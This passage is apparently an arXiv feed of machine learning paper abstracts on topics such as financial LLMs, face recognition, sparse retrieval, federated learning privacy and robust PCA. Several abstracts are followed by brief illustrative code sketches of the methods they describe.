    Large language models (LLMs) have demonstrated remarkable proficiency in understanding and generating human-like texts, which may potentially revolutionize the finance industry. However, existing LLMs often fall short in the financial field, which is mainly attributed to the disparities between general text data and financial text data. Unfortunately, only a limited number of financial text datasets are available, and those are quite small, while BloombergGPT, the first financial LLM (FinLLM), is closed-source (only the training logs were released). In light of this, we aim to democratize Internet-scale financial data for LLMs, which is an open challenge due to diverse data sources, low signal-to-noise ratio, and high time-validity. To address the challenges, we introduce an open-sourced and data-centric framework, \textit{Financial Generative Pre-trained Transformer (FinGPT)}, that automates the collection and curation of real-time financial data from >34 diverse sources on the Internet, providing researchers and practitioners with accessible and transparent resources to develop their FinLLMs. Additionally, we propose a simple yet effective strategy for fine-tuning FinLLM using the inherent feedback from the market, dubbed Reinforcement Learning with Stock Prices (RLSP). We also adopt the Low-rank Adaptation (LoRA, QLoRA) method that enables users to customize their own FinLLMs from open-source general-purpose LLMs at a low cost. Finally, we showcase several FinGPT applications, including robo-advisor, sentiment analysis for algorithmic trading, and low-code development. FinGPT aims to democratize FinLLMs, stimulate innovation, and unlock new opportunities in open finance. The codes are available at https://github.com/AI4Finance-Foundation/FinGPT and https://github.com/AI4Finance-Foundation/FinNLP
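    The LoRA idea the framework adopts can be sketched in a few lines: freeze the pretrained weight and train only a low-rank update, cutting the trainable parameter count from d_in*d_out to r*(d_in+d_out). This is a generic numpy sketch of the technique, not FinGPT's code:

```python
import numpy as np

d_in, d_out, r = 64, 64, 4
rng = np.random.default_rng(0)
W = rng.normal(size=(d_out, d_in))       # frozen pretrained weight
A = rng.normal(size=(r, d_in)) * 0.01    # trainable low-rank factor
B = np.zeros((d_out, r))                 # trainable; zero-init so the
                                         # adapted model starts identical
                                         # to the base model

def lora_forward(x):
    # Effective weight is W + B @ A, but B @ A is never materialized.
    return W @ x + B @ (A @ x)

x = rng.normal(size=d_in)
print("trainable params:", r * (d_in + d_out), "vs full:", d_in * d_out)
```

    Only A and B receive gradient updates during fine-tuning; QLoRA additionally quantizes the frozen W to cut memory further.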
    CoNAN: Conditional Neural Aggregation Network For Unconstrained Face Feature Fusion. (arXiv:2307.10237v1 [cs.CV])
    Face recognition from image sets acquired under unregulated and uncontrolled settings, such as at large distances, low resolutions, varying viewpoints, illumination, pose, and atmospheric conditions, is challenging. Face feature aggregation, which involves aggregating a set of N feature representations present in a template into a single global representation, plays a pivotal role in such recognition systems. Existing works in traditional face feature aggregation either utilize metadata or high-dimensional intermediate feature representations to estimate feature quality for aggregation. However, generating high-quality metadata or style information is not feasible for extremely low-resolution faces captured in long-range and high altitude settings. To overcome these limitations, we propose a feature distribution conditioning approach called CoNAN for template aggregation. Specifically, our method aims to learn a context vector conditioned over the distribution information of the incoming feature set, which is utilized to weigh the features based on their estimated informativeness. The proposed method produces state-of-the-art results on long-range unconstrained face recognition datasets such as BTS, and DroneSURF, validating the advantages of such an aggregation strategy.
    SPRINT: A Unified Toolkit for Evaluating and Demystifying Zero-shot Neural Sparse Retrieval. (arXiv:2307.10488v1 [cs.IR])
    Traditionally, sparse retrieval systems that rely on lexical representations to retrieve documents, such as BM25, dominated information retrieval tasks. With the onset of pre-trained transformer models such as BERT, neural sparse retrieval has led to a new paradigm within retrieval. Despite the success, there has been limited software supporting different sparse retrievers running in a unified, common environment. This hinders practitioners from fairly comparing different sparse models and obtaining realistic evaluation results. Another missing piece is that a majority of prior work evaluates sparse retrieval models on in-domain retrieval, i.e. on a single dataset: MS MARCO. However, practical retrieval systems require models that can generalize well to unseen out-of-domain, i.e. zero-shot, retrieval tasks. In this work, we provide SPRINT, a unified Python toolkit based on Pyserini and Lucene, supporting a common interface for evaluating neural sparse retrieval. The toolkit currently includes five built-in models: uniCOIL, DeepImpact, SPARTA, TILDEv2 and SPLADEv2. Users can also easily add customized models by defining their term weighting method. Using our toolkit, we establish strong and reproducible zero-shot sparse retrieval baselines across the well-acknowledged benchmark, BEIR. Our results demonstrate that SPLADEv2 achieves the best average score of 0.470 nDCG@10 on BEIR amongst all neural sparse retrievers. In this work, we further uncover the reasons behind its performance gain. We show that SPLADEv2 produces sparse representations whose tokens mostly lie outside of the original query and document, which is often crucial for its performance gains and a capability its other sparse counterparts lack. We provide our SPRINT toolkit, models, and data used in our experiments publicly here at https://github.com/thakur-nandan/sprint.
    Adversarial Training Over Long-Tailed Distribution. (arXiv:2307.10205v1 [cs.LG])
    In this paper, we study adversarial training on datasets that obey the long-tailed distribution, which is practical but rarely explored in previous works. Compared with conventional adversarial training on balanced datasets, this process falls into the dilemma of generating uneven adversarial examples (AEs) and an unbalanced feature embedding space, causing the resulting model to exhibit low robustness and accuracy on tail data. To combat that, we propose a new adversarial training framework -- Re-balancing Adversarial Training (REAT). This framework consists of two components: (1) a new training strategy inspired by the term effective number to guide the model to generate more balanced and informative AEs; (2) a carefully constructed penalty function to force a satisfactory feature space. Evaluation results on different datasets and model structures prove that REAT can effectively enhance the model's robustness and preserve the model's clean accuracy. The code can be found in https://github.com/GuanlinLee/REAT.
    Community-Aware Transformer for Autism Prediction in fMRI Connectome. (arXiv:2307.10181v1 [q-bio.NC])
    Autism spectrum disorder (ASD) is a lifelong neurodevelopmental condition that affects social communication and behavior. Investigating functional magnetic resonance imaging (fMRI)-based brain functional connectome can aid in the understanding and diagnosis of ASD, leading to more effective treatments. The brain is modeled as a network of brain Regions of Interest (ROIs); ROIs form communities, and knowledge of these communities is crucial for ASD diagnosis. On the one hand, Transformer-based models have proven to be highly effective across several tasks, including fMRI connectome analysis to learn useful representations of ROIs. On the other hand, existing transformer-based models treat all ROIs equally and overlook the impact of community-specific associations when learning node embeddings. To fill this gap, we propose a novel method, Com-BrainTF, a hierarchical local-global transformer architecture that learns intra- and inter-community aware node embeddings for the ASD prediction task. Furthermore, we avoid over-parameterization by sharing the local transformer parameters for different communities but optimize unique learnable prompt tokens for each community. Our model outperforms state-of-the-art (SOTA) architectures on the ABIDE dataset and has high interpretability, evident from the attention module. Our code is available at https://github.com/ubc-tea/Com-BrainTF.
    Can Instruction Fine-Tuned Language Models Identify Social Bias through Prompting?. (arXiv:2307.10472v1 [cs.CL])
    As the breadth and depth of language model applications continue to expand rapidly, it is increasingly important to build efficient frameworks for measuring and mitigating the learned or inherited social biases of these models. In this paper, we present our work on evaluating instruction fine-tuned language models' ability to identify bias through zero-shot prompting, including Chain-of-Thought (CoT) prompts. Across LLaMA and its two instruction fine-tuned versions, Alpaca 7B performs best on the bias identification task with an accuracy of 56.7%. We also demonstrate that scaling up LLM size and data diversity could lead to further performance gain. This is a work-in-progress presenting the first component of our bias mitigation framework. We will keep updating this work as we get more results.
    Torchhd: An Open Source Python Library to Support Research on Hyperdimensional Computing and Vector Symbolic Architectures. (arXiv:2205.09208v2 [cs.LG] UPDATED)
    Hyperdimensional computing (HD), also known as vector symbolic architectures (VSA), is a framework for computing with distributed representations by exploiting properties of random high-dimensional vector spaces. The commitment of the scientific community to aggregate and disseminate research in this particularly multidisciplinary area has been fundamental for its advancement. Joining these efforts, we present Torchhd, a high-performance open source Python library for HD/VSA. Torchhd seeks to make HD/VSA more accessible and serves as an efficient foundation for further research and application development. The easy-to-use library builds on top of PyTorch and features state-of-the-art HD/VSA functionality, clear documentation, and implementation examples from well-known publications. Comparing publicly available code with their corresponding Torchhd implementation shows that experiments can run up to 100x faster. Torchhd is available at: https://github.com/hyperdimensional-computing/torchhd.
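    The core HD/VSA operations that Torchhd provides can be sketched in a few lines of plain Python with bipolar hypervectors. This is a toy illustration of the framework's binding/bundling algebra, not Torchhd's API.

    ```python
    import random

    random.seed(0)
    DIM = 10_000  # hypervector dimensionality

    def rand_hv():
        """Random bipolar hypervector with +1/-1 entries."""
        return [random.choice((-1, 1)) for _ in range(DIM)]

    def bind(a, b):
        """Binding: elementwise multiply; the result is dissimilar to both inputs."""
        return [x * y for x, y in zip(a, b)]

    def bundle(vectors):
        """Bundling: elementwise majority sign; the result stays similar to each input."""
        return [1 if sum(col) >= 0 else -1 for col in zip(*vectors)]

    def sim(a, b):
        """Normalized dot product in [-1, 1]."""
        return sum(x * y for x, y in zip(a, b)) / DIM

    a, b, c = rand_hv(), rand_hv(), rand_hv()
    pair = bind(a, b)           # role-filler binding
    memory = bundle([a, b, c])  # superposition of three items

    print(sim(a, memory) > 0.3)          # bundling preserves similarity
    print(abs(sim(a, pair)) < 0.1)       # binding destroys similarity
    print(sim(bind(pair, b), a) == 1.0)  # unbinding with b recovers a exactly
    ```

    Because bipolar entries satisfy b*b = 1, binding is its own inverse, which is what makes structured, queryable representations possible in this algebra.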
    DP-TBART: A Transformer-based Autoregressive Model for Differentially Private Tabular Data Generation. (arXiv:2307.10430v1 [cs.LG])
    The generation of synthetic tabular data that preserves differential privacy is a problem of growing importance. While traditional marginal-based methods have achieved impressive results, recent work has shown that deep learning-based approaches tend to lag behind. In this work, we present Differentially-Private TaBular AutoRegressive Transformer (DP-TBART), a transformer-based autoregressive model that maintains differential privacy and achieves performance competitive with marginal-based methods on a wide variety of datasets, capable of even outperforming state-of-the-art methods in certain settings. We also provide a theoretical framework for understanding the limitations of marginal-based approaches and where deep learning-based approaches stand to contribute most. These results suggest that deep learning-based techniques should be considered as a viable alternative to marginal-based methods in the generation of differentially private synthetic tabular data.
    Confidence Estimation Using Unlabeled Data. (arXiv:2307.10440v1 [cs.LG])
    Overconfidence is a common issue for deep neural networks, limiting their deployment in real-world applications. To better estimate confidence, existing methods mostly focus on fully-supervised scenarios and rely on training labels. In this paper, we propose the first confidence estimation method for a semi-supervised setting, where most training labels are unavailable. We stipulate that even with limited training labels, we can still reasonably approximate the model's confidence on unlabeled samples by inspecting the consistency of its predictions through the training process. We use training consistency as a surrogate function and propose a consistency ranking loss for confidence estimation. On both image classification and segmentation tasks, our method achieves state-of-the-art performance in confidence estimation. Furthermore, we show the benefit of the proposed method through a downstream active learning task. The code is available at https://github.com/TopoXLab/consistency-ranking-loss.
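    The consistency surrogate can be sketched in a few lines: track each unlabeled sample's predicted label per epoch, and score confidence as the fraction of epochs that already agreed with the final prediction. This is a minimal sketch of the idea, not the paper's consistency ranking loss.

    ```python
    def consistency_confidence(pred_history):
        """Surrogate confidence from prediction consistency across training.

        pred_history: list of per-epoch predicted labels for one sample.
        Returns the fraction of epochs on which the model already agreed
        with its final prediction.
        """
        final = pred_history[-1]
        return sum(p == final for p in pred_history) / len(pred_history)

    # A sample whose prediction was stable throughout training is assigned
    # higher confidence than one whose prediction flipped late.
    stable = ["cat"] * 10
    unstable = ["dog"] * 6 + ["cat"] * 4
    print(consistency_confidence(stable))    # → 1.0
    print(consistency_confidence(unstable))  # → 0.4
    ```

    Ranking unlabeled samples by this score then gives a natural acquisition signal for the downstream active learning task mentioned above.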
    Eliminating Label Leakage in Tree-Based Vertical Federated Learning. (arXiv:2307.10318v1 [cs.LG])
    Vertical federated learning (VFL) enables multiple parties with disjoint features of a common user set to train a machine learning model without sharing their private data. Tree-based models have become prevalent in VFL due to their interpretability and efficiency. However, the vulnerability of tree-based VFL has not been sufficiently investigated. In this study, we first introduce a novel label inference attack, ID2Graph, which utilizes the sets of record-IDs assigned to each node (i.e., instance space) to deduce private training labels. The ID2Graph attack generates a graph structure from training samples, extracts communities from the graph, and clusters the local dataset using community information. To counteract label leakage from the instance space, we propose an effective defense mechanism, ID-LMID, which prevents label leakage by focusing on mutual information regularization. Comprehensive experiments conducted on various datasets reveal that the ID2Graph attack presents significant risks to tree-based models such as Random Forest and XGBoost. Further evaluations on these benchmarks demonstrate that ID-LMID effectively mitigates label leakage in such instances.
    Automated Action Model Acquisition from Narrative Texts. (arXiv:2307.10247v1 [cs.CL])
    Action models, which take the form of precondition/effect axioms, facilitate causal and motivational connections between actions for AI agents. Action model acquisition has been identified as a bottleneck in the application of planning technology, especially within narrative planning. Acquiring action models from narrative texts in an automated way is essential, but challenging because of the inherent complexities of such texts. We present NaRuto, a system that extracts structured events from narrative text and subsequently generates planning-language-style action models based on predictions of commonsense event relations, as well as textual contradictions and similarities, in an unsupervised manner. Experimental results in classical narrative planning domains show that NaRuto can generate action models of significantly better quality than existing fully automated methods, and even on par with those of semi-automated methods.
    Automated Knowledge Modeling for Cancer Clinical Practice Guidelines. (arXiv:2307.10231v1 [cs.AI])
    Clinical Practice Guidelines (CPGs) for cancer diseases evolve rapidly due to new evidence generated by active research. Currently, CPGs are primarily published in a document format that is ill-suited for managing this developing knowledge. A knowledge model of the guideline documents suitable for programmatic interaction is required. This work proposes an automated method for extracting knowledge from National Comprehensive Cancer Network (NCCN) CPGs in Oncology and generating a structured model containing the retrieved knowledge. The proposed method was tested using two versions of the NCCN Non-Small Cell Lung Cancer (NSCLC) CPG to demonstrate its effectiveness in faithfully extracting and modeling knowledge. Three enrichment strategies, using cancer staging information, Unified Medical Language System (UMLS) Metathesaurus and National Cancer Institute Thesaurus (NCIt) concepts, and node classification, are also presented to enhance the model toward enabling programmatic traversal and querying of cancer care guidelines. Node classification was performed using a Support Vector Machine (SVM) model, achieving a classification accuracy of 0.81 with 10-fold cross-validation.
    A Review of Machine Learning Methods Applied to Structural Dynamics and Vibroacoustic. (arXiv:2204.06362v2 [cs.LG] UPDATED)
    The use of Machine Learning (ML) has rapidly spread across several fields, having encountered many applications in Structural Dynamics and Vibroacoustic (SD&V). The increasing capabilities of ML to unveil insights from data, driven by unprecedented data availability, algorithmic advances and computational power, enhance decision making, uncertainty handling, pattern recognition and real-time assessments. Three main applications in SD&V have taken advantage of these benefits. In Structural Health Monitoring, ML detection and prognosis lead to safe operation and optimized maintenance schedules. System identification and control design are leveraged by ML techniques in Active Noise Control and Active Vibration Control. Finally, the so-called ML-based surrogate models provide fast alternatives to costly simulations, enabling robust and optimized product design. Despite the many works in the area, a systematic review and analysis of them has been lacking. Therefore, to keep track of and understand this ongoing integration of fields, this paper presents a survey of ML applications in SD&V analyses, shedding light on the current state of implementation and emerging opportunities. The main methodologies, advantages, limitations, and recommendations based on scientific knowledge were identified for each of the three applications. Moreover, the paper considers the role of Digital Twins and Physics Guided ML to overcome current challenges and power future research progress. As a result, the survey provides a broad overview of the present landscape of ML applied in SD&V and guides the reader to an advanced understanding of progress and prospects in the field.
    Novel Batch Active Learning Approach and Its Application to Synthetic Aperture Radar Datasets. (arXiv:2307.10495v1 [cs.LG])
    Active learning improves the performance of machine learning methods by judiciously selecting a limited number of unlabeled data points to query for labels, with the aim of maximally improving the underlying classifier's performance. Recent gains have been made using sequential active learning for synthetic aperture radar (SAR) data (arXiv:2204.00005). In each iteration, sequential active learning selects a query set of size one, while batch active learning selects a query set of multiple data points. While batch active learning methods exhibit greater efficiency, the challenge lies in maintaining model accuracy relative to sequential active learning methods. We developed a novel, two-part approach for batch active learning: Dijkstra's Annulus Core-Set (DAC) for core-set generation and LocalMax for batch sampling. The batch active learning process that combines DAC and LocalMax achieves nearly identical accuracy to sequential active learning but is more efficient, with speedup proportional to the batch size. As an application, a pipeline is built based on transfer learning feature embedding, graph learning, DAC, and LocalMax to classify the FUSAR-Ship and OpenSARShip datasets. Our pipeline outperforms state-of-the-art CNN-based methods.
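    The sequential-vs-batch distinction can be made concrete with a generic batch acquisition rule: rank the unlabeled pool by predictive entropy and take the top k at once. This is a standard baseline for illustration, not the paper's DAC + LocalMax method, which additionally enforces diversity within the selected batch.

    ```python
    import math

    def entropy(probs):
        """Shannon entropy of a predictive distribution."""
        return -sum(p * math.log(p) for p in probs if p > 0)

    def batch_query(unlabeled, predict_proba, batch_size):
        """Select the batch_size most uncertain points by predictive entropy.
        With batch_size=1 this reduces to sequential uncertainty sampling."""
        ranked = sorted(unlabeled, key=lambda x: entropy(predict_proba(x)),
                        reverse=True)
        return ranked[:batch_size]

    # Toy pool: point ids mapped to hypothetical class probabilities.
    probs = {1: [0.5, 0.5], 2: [0.9, 0.1], 3: [0.6, 0.4]}
    print(batch_query([1, 2, 3], probs.get, batch_size=2))  # → [1, 3]
    ```

    Pure entropy ranking tends to pick redundant near-duplicate points, which is exactly the failure mode that diversity-aware batch methods like the paper's are designed to avoid.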
    Polyffusion: A Diffusion Model for Polyphonic Score Generation with Internal and External Controls. (arXiv:2307.10304v1 [cs.SD])
    We propose Polyffusion, a diffusion model that generates polyphonic music scores by regarding music as image-like piano roll representations. The model is capable of controllable music generation with two paradigms: internal control and external control. Internal control refers to the process in which users pre-define a part of the music and then let the model infill the rest, similar to the task of masked music generation (or music inpainting). External control conditions the model with external yet related information, such as chord, texture, or other features, via the cross-attention mechanism. We show that by using internal and external controls, Polyffusion unifies a wide range of music creation tasks, including melody generation given accompaniment, accompaniment generation given melody, arbitrary music segment inpainting, and music arrangement given chords or textures. Experimental results show that our model significantly outperforms existing Transformer and sampling-based baselines, and using pre-trained disentangled representations as external conditions yields more effective controls.
    Reproducibility in Machine Learning-Driven Research. (arXiv:2307.10320v1 [cs.LG])
    Research is facing a reproducibility crisis, in which the results and findings of many studies are difficult or even impossible to reproduce. This is also the case in machine learning (ML) and artificial intelligence (AI) research. Often, this is due to unpublished data and/or source code, and to sensitivity to ML training conditions. Although different solutions to address this issue are discussed in the research community, such as using ML platforms, the level of reproducibility in ML-driven research is not increasing substantially. Therefore, in this mini survey, we review the literature on reproducibility in ML-driven research with three main aims: (i) reflect on the current situation of ML reproducibility in various research fields, (ii) identify reproducibility issues and barriers in these research fields applying ML, and (iii) identify potential drivers such as tools, practices, and interventions that support ML reproducibility. With this, we hope to contribute to decisions on the viability of different solutions for supporting ML reproducibility.
    Performance Issue Identification in Cloud Systems with Relational-Temporal Anomaly Detection. (arXiv:2307.10869v1 [cs.LG])
    Performance issues permeate large-scale cloud service systems, which can lead to huge revenue losses. To ensure reliable performance, it's essential to accurately identify and localize these issues using service monitoring metrics. Given the complexity and scale of modern cloud systems, this task can be challenging and may require extensive expertise and resources beyond the capacity of individual humans. Some existing methods tackle this problem by analyzing each metric independently to detect anomalies. However, this could incur overwhelming alert storms that are difficult for engineers to diagnose manually. To pursue better performance, not only the temporal patterns of metrics but also the correlation between metrics (i.e., relational patterns) should be considered, which can be formulated as a multivariate metrics anomaly detection problem. However, most of the studies fall short of extracting these two types of features explicitly. Moreover, there exist some unlabeled anomalies mixed in the training data, which may hinder the detection performance. To address these limitations, we propose the Relational-Temporal Anomaly Detection Model (RTAnomaly) that combines the relational and temporal information of metrics. RTAnomaly employs a graph attention layer to learn the dependencies among metrics, which will further help pinpoint the anomalous metrics that may cause the anomaly effectively. In addition, we exploit the concept of positive unlabeled learning to address the issue of potential anomalies in the training data. To evaluate our method, we conduct experiments on a public dataset and two industrial datasets. RTAnomaly outperforms all the baseline models by achieving an average F1 score of 0.929 and Hit@3 of 0.920, demonstrating its superiority.
    Data-Efficient Augmentation for Training Neural Networks. (arXiv:2210.08363v3 [cs.LG] UPDATED)
    Data augmentation is essential to achieve state-of-the-art performance in many deep learning applications. However, the most effective augmentation techniques become computationally prohibitive for even medium-sized datasets. To address this, we propose a rigorous technique to select subsets of data points that when augmented, closely capture the training dynamics of full data augmentation. We first show that data augmentation, modeled as additive perturbations, improves learning and generalization by relatively enlarging and perturbing the smaller singular values of the network Jacobian, while preserving its prominent directions. This prevents overfitting and enhances learning the harder to learn information. Then, we propose a framework to iteratively extract small subsets of training data that when augmented, closely capture the alignment of the fully augmented Jacobian with labels/residuals. We prove that stochastic gradient descent applied to the augmented subsets found by our approach has similar training dynamics to that of fully augmented data. Our experiments demonstrate that our method achieves 6.3x speedup on CIFAR10 and 2.2x speedup on SVHN, and outperforms the baselines by up to 10% across various subset sizes. Similarly, on TinyImageNet and ImageNet, our method beats the baselines by up to 8%, while achieving up to 3.3x speedup across various subset sizes. Finally, training on and augmenting 50% subsets using our method on a version of CIFAR10 corrupted with label noise even outperforms using the full dataset. Our code is available at: https://github.com/tianyu139/data-efficient-augmentation
    AlignAtt: Using Attention-based Audio-Translation Alignments as a Guide for Simultaneous Speech Translation. (arXiv:2305.11408v2 [cs.CL] UPDATED)
    Attention is the core mechanism of today's most used architectures for natural language processing and has been analyzed from many perspectives, including its effectiveness for machine translation-related tasks. Among these studies, attention has proven to be a useful source of information for gaining insight into word alignment, even when the input text is replaced with audio segments, as in the speech translation (ST) task. In this paper, we propose AlignAtt, a novel policy for simultaneous ST (SimulST) that exploits the attention information to generate source-target alignments that guide the model during inference. Through experiments on the 8 language pairs of MuST-C v1.0, we show that AlignAtt outperforms previous state-of-the-art SimulST policies applied to offline-trained models, with BLEU gains of 2 points and latency reductions ranging from 0.5s to 0.8s across the 8 languages.
    Sequential Kernel Embedding for Mediated and Time-Varying Dose Response Curves. (arXiv:2111.03950v4 [stat.ME] UPDATED)
    We propose simple nonparametric estimators for mediated and time-varying dose response curves based on kernel ridge regression. By embedding Pearl's mediation formula and Robins' g-formula with kernels, we allow treatments, mediators, and covariates to be continuous in general spaces, and also allow for nonlinear treatment-confounder feedback. Our key innovation is a reproducing kernel Hilbert space technique called sequential kernel embedding, which we use to construct simple estimators for complex causal estimands. Our estimators preserve the generality of classic identification while also achieving nonasymptotic uniform rates. In nonlinear simulations with many covariates, we demonstrate strong performance. We estimate mediated and time-varying dose response curves of the US Job Corps, and clean data that may serve as a benchmark in future work. We extend our results to mediated and time-varying treatment effects and counterfactual distributions, verifying semiparametric efficiency and weak convergence.
    Robust Principal Component Analysis: A Median of Means Approach. (arXiv:2102.03403v2 [stat.ML] UPDATED)
    Principal Component Analysis (PCA) is a fundamental tool for data visualization, denoising, and dimensionality reduction. It is widely popular in Statistics, Machine Learning, Computer Vision, and related fields. However, PCA is well-known to fall prey to outliers and often fails to detect the true underlying low-dimensional structure within the dataset. Following the Median of Means (MoM) philosophy, recent supervised learning methods have shown great success in dealing with outlying observations without much compromise to their large-sample theoretical properties. This paper proposes a PCA procedure based on the MoM principle. Called Median of Means Principal Component Analysis (MoMPCA), the proposed method is not only computationally appealing but also achieves optimal convergence rates under minimal assumptions. In particular, we explore the non-asymptotic error bounds of the obtained solution with the aid of Rademacher complexities, while making absolutely no assumptions about the outlying observations. The derived concentration results are dimension-free because the analysis is conducted in a separable Hilbert space, and they depend only on the fourth moment of the underlying distribution in the corresponding norm. The proposal's efficacy is thoroughly showcased through simulations and real-data applications.
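    The MoM philosophy is easiest to see in one dimension: split the data into blocks, average each block, and take the median of the block means, so that a few gross outliers can corrupt only a few blocks. This is the one-dimensional building block of the idea, not the paper's full MoMPCA procedure.

    ```python
    import random
    import statistics

    def median_of_means(xs, n_blocks):
        """Median-of-means location estimate: shuffle, split into blocks,
        average each block, and return the median of the block means."""
        random.shuffle(xs)
        size = len(xs) // n_blocks
        blocks = [xs[i * size:(i + 1) * size] for i in range(n_blocks)]
        return statistics.median(statistics.mean(b) for b in blocks)

    random.seed(1)
    # 990 clean standard-normal samples plus 10 gross outliers.
    data = [random.gauss(0.0, 1.0) for _ in range(990)] + [1e6] * 10

    print(abs(statistics.mean(data)))     # plain mean is ruined (~10,000)
    print(abs(median_of_means(data, 30))) # MoM stays near the true mean 0
    ```

    The 10 outliers can contaminate at most 10 of the 30 blocks, so the median over block means remains close to the uncorrupted mean; MoMPCA lifts this robustness to the PCA setting.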
    ProtiGeno: a prokaryotic short gene finder using protein language models. (arXiv:2307.10343v1 [q-bio.GN])
    Prokaryotic gene prediction plays an important role in understanding the biology of organisms and their function with applications in medicine and biotechnology. Although the current gene finders are highly sensitive in finding long genes, their sensitivity decreases noticeably in finding shorter genes (<180 nts). The culprit is insufficient annotated gene data to identify distinguishing features in short open reading frames (ORFs). We develop a deep learning-based method called ProtiGeno, specifically targeting short prokaryotic genes using a protein language model trained on millions of evolved proteins. In systematic large-scale experiments on 4,288 prokaryotic genomes, we demonstrate that ProtiGeno predicts short coding and noncoding genes with higher accuracy and recall than the current state-of-the-art gene finders. We discuss the predictive features of ProtiGeno and possible limitations by visualizing the three-dimensional structure of the predicted short genes. Data, codes, and models are available at https://github.com/tonytu16/protigeno.
    TwinLiteNet: An Efficient and Lightweight Model for Driveable Area and Lane Segmentation in Self-Driving Cars. (arXiv:2307.10705v1 [cs.CV])
    Semantic segmentation is a common task in autonomous driving for understanding the surrounding environment. Driveable Area Segmentation and Lane Detection are particularly important for safe and efficient navigation on the road. However, conventional semantic segmentation models are computationally expensive and require high-end hardware, which is not feasible for embedded systems in autonomous vehicles. This paper proposes a lightweight model for driveable area and lane line segmentation. TwinLiteNet is designed to be computationally cheap yet achieves accurate and efficient segmentation. We evaluate TwinLiteNet on the BDD100K dataset and compare it with modern models. Experimental results show that TwinLiteNet performs similarly to existing approaches while requiring significantly fewer computational resources. Specifically, TwinLiteNet achieves a mIoU score of 91.3% on the Drivable Area task and 31.08% IoU on the Lane Detection task with only 0.4 million parameters, reaching 415 FPS on an RTX A5000 GPU. Furthermore, TwinLiteNet runs in real time on embedded devices with limited computing power, achieving 60 FPS on a Jetson Xavier NX, making it an ideal solution for self-driving vehicles. Code is available at: https://github.com/chequanghuy/TwinLiteNet.
    Regular SE(3) Group Convolutions for Volumetric Medical Image Analysis. (arXiv:2306.13960v2 [cs.CV] UPDATED)
    Regular group convolutional neural networks (G-CNNs) have been shown to increase model performance and improve equivariance to different geometrical symmetries. This work addresses the problem of SE(3), i.e., roto-translation equivariance, on volumetric data. Volumetric image data is prevalent in many medical settings. Motivated by the recent work on separable group convolutions, we devise a SE(3) group convolution kernel separated into a continuous SO(3) (rotation) kernel and a spatial kernel. We approximate equivariance to the continuous setting by sampling uniform SO(3) grids. Our continuous SO(3) kernel is parameterized via RBF interpolation on similarly uniform grids. We demonstrate the advantages of our approach in volumetric medical image analysis. Our SE(3) equivariant models consistently outperform CNNs and regular discrete G-CNNs on challenging medical classification tasks and show significantly improved generalization capabilities. Our approach achieves up to a 16.5% gain in accuracy over regular CNNs.
    Analyzing sports commentary in order to automatically recognize events and extract insights. (arXiv:2307.10303v1 [cs.CL])
    In this paper, we investigate how multiple Natural Language Processing techniques and methods can be used to automatically recognize the main actions in sports events. We aim to extract insights by analyzing live sports commentaries from different sources and by classifying these major actions into different categories. We also study whether sentiment analysis could help detect these main actions.
    Integrating a Heterogeneous Graph with Entity-aware Self-attention using Relative Position Labels for Reading Comprehension Model. (arXiv:2307.10443v1 [cs.CL])
    Despite the significant progress made by transformer models in machine reading comprehension tasks, they still face limitations in handling complex reasoning tasks due to the absence of explicit knowledge in the input sequence. This paper proposes a novel attention pattern to overcome this limitation, which integrates reasoning knowledge derived from a heterogeneous graph into the transformer architecture using a graph-enhanced self-attention mechanism. The proposed attention pattern comprises three key elements: global-local attention for word tokens, graph attention for entity tokens that exhibit strong attention towards tokens connected in the graph as opposed to those unconnected, and the consideration of the type of relationship between each entity token and word token. This results in optimized attention between the two if a relationship exists. The pattern is coupled with special relative position labels, allowing it to integrate with LUKE's entity-aware self-attention mechanism. The experimental findings corroborate that our model outperforms both the cutting-edge LUKE-Graph and the baseline LUKE model on the ReCoRD dataset that focuses on commonsense reasoning.
    Multi-Scale U-Shape MLP for Hyperspectral Image Classification. (arXiv:2307.10186v1 [eess.IV])
    Hyperspectral images have significant applications in various domains, since they capture rich semantic and spatial information across spectral bands, along with the spatial variability of spectral signatures. Two critical challenges in classifying hyperspectral pixels are representing the correlated local and global information and managing the model's abundant parameters. To tackle these challenges, we propose a Multi-Scale U-shape Multi-Layer Perceptron (MUMLP), a model consisting of the designed MSC (Multi-Scale Channel) block and the UMLP (U-shape Multi-Layer Perceptron) structure. MSC transforms the channel dimension and mixes spectral band features to adequately embed the deep-level representation. UMLP is designed as an encoder-decoder structure with multi-layer perceptron layers, which is capable of compressing the large-scale parameters. Extensive experiments demonstrate that our model outperforms state-of-the-art methods across the board on three widely adopted public datasets, namely Pavia University, Houston 2013, and Houston 2018.
    A Competitive Learning Approach for Specialized Models: A Solution for Complex Physical Systems with Distinct Functional Regimes. (arXiv:2307.10496v1 [cs.LG])
    Complex systems in science and engineering sometimes exhibit behavior that changes across different regimes. Traditional global models struggle to capture the full range of this complex behavior, limiting their ability to accurately represent the system. In response to this challenge, we propose a novel competitive learning approach for obtaining data-driven models of physical systems. The primary idea behind the proposed approach is to employ dynamic loss functions for a set of models that are trained concurrently on the data. Each model competes for each observation during training, allowing for the identification of distinct functional regimes within the dataset. To demonstrate the effectiveness of the learning approach, we coupled it with various regression methods that employ gradient-based optimizers for training. The proposed approach was tested on various problems involving model discovery and function approximation, demonstrating its ability to successfully identify functional regimes, discover true governing equations, and reduce test errors.
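    The competitive idea above can be sketched concretely: each observation is claimed by whichever model currently fits it best, then each model is refit on only its own points, so the models specialize to distinct regimes. This is a minimal sketch with two slope-only linear models on piecewise data, not the authors' full dynamic-loss formulation.

    ```python
    def fit_slope(points):
        """Closed-form least squares for y = w * x."""
        num = sum(x * y for x, y in points)
        den = sum(x * x for x, y in points)
        return num / den

    def competitive_fit(points, w1, w2, n_iters=10):
        """Competitive learning: each point is assigned to the model with the
        smaller residual, then each model is refit on its assigned points."""
        for _ in range(n_iters):
            s1 = [(x, y) for x, y in points if abs(y - w1 * x) <= abs(y - w2 * x)]
            s2 = [(x, y) for x, y in points if abs(y - w1 * x) > abs(y - w2 * x)]
            if s1:
                w1 = fit_slope(s1)
            if s2:
                w2 = fit_slope(s2)
        return w1, w2

    # Two functional regimes: y = 2x for x < 0 and y = -3x for x > 0.
    data = [(x, 2 * x) for x in range(-5, 0)] + [(x, -3 * x) for x in range(1, 6)]
    print(competitive_fit(data, w1=1.0, w2=-1.0))  # → (2.0, -3.0)
    ```

    After one round of competition each model captures one regime exactly; with noisy data and gradient-based learners the same assignment-then-refit loop identifies the regimes approximately.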
    Decentralized Smart Charging of Large-Scale EVs using Adaptive Multi-Agent Multi-Armed Bandits. (arXiv:2307.10704v1 [cs.LG])
